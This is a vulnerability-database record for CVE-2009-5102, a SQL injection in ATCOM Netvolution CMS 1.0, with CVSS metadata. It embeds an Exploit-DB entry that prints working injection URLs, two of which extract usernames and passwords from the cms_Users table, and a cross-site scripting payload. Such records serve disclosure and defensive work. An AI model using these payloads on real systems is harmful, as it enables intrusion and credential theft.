ID CVE-2009-5102Type cveReporter cve@mitre.orgModified 2012-05-14T04:00:00
Description
SQL injection vulnerability in default.asp in ATCOM Netvolution 1.0 ASP allows remote attackers to execute arbitrary SQL commands via the bpe_nid parameter.
{"id": "CVE-2009-5102", "bulletinFamily": "NVD", "title": "CVE-2009-5102", "description": "SQL injection vulnerability in default.asp in ATCOM Netvolution 1.0 ASP allows remote attackers to execute arbitrary SQL commands via the bpe_nid parameter.", "published": "2011-10-21T10:55:00", "modified": "2012-05-14T04:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-5102", "reporter": "cve@mitre.org", "references": ["http://www.exploit-db.com/exploits/7761/"], "cvelist": ["CVE-2009-5102"], "type": "cve", "lastseen": "2020-10-03T11:54:20", "edition": 3, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7761"]}], "modified": "2020-10-03T11:54:20", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2020-10-03T11:54:20", "rev": 2}, "vulnersScore": 7.6}, "cpe": ["cpe:/a:atcom:netvolution:1.0"], "affectedSoftware": [{"cpeName": "atcom:netvolution", "name": "atcom netvolution", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:atcom:netvolution:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:atcom:netvolution:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-01T02:59:57", "description": "Netvolution CMS 1.0 (XSS/SQL) Multiple Remote Vulnerabilities. CVE-2009-5102,CVE-2009-5103. Webapps exploit for asp platform", "published": "2009-01-14T00:00:00", "type": "exploitdb", "title": "netvolution CMS 1.0 xss/SQL Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-5102", "CVE-2009-5103"], "modified": "2009-01-14T00:00:00", "id": "EDB-ID:7761", "href": "https://www.exploit-db.com/exploits/7761/", "sourceData": "###############################################\nFound By : Ellinas aka Greek \nEmail: ellinas.security@gmail.com \nVulnerable Product: CMS netvolution v1.0 \nwebsite : www.netvolution.net , www.atcom.gr \n##############################################\n\nSQL Injection\n\nVersion Finding:\n\nhttp://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=100%20AND%20SUBSTRING(@@version,1,130)=5\n\n\nPassword Finding:\n\nhttp://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20AND%20\n(select%20(substring(userPassword,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608\n\n\nUsername Finding:\n\nhttp://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20\nAND%20(select%20(substring(userName,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608\n\nCross Site Scripting\n\nSet the variable email to >\"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>\n\n\n************************\nMany Greetings to:\n \nAll Greek Hackers.\n*************************\n\n# milw0rm.com [2009-01-14]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7761/"}]}
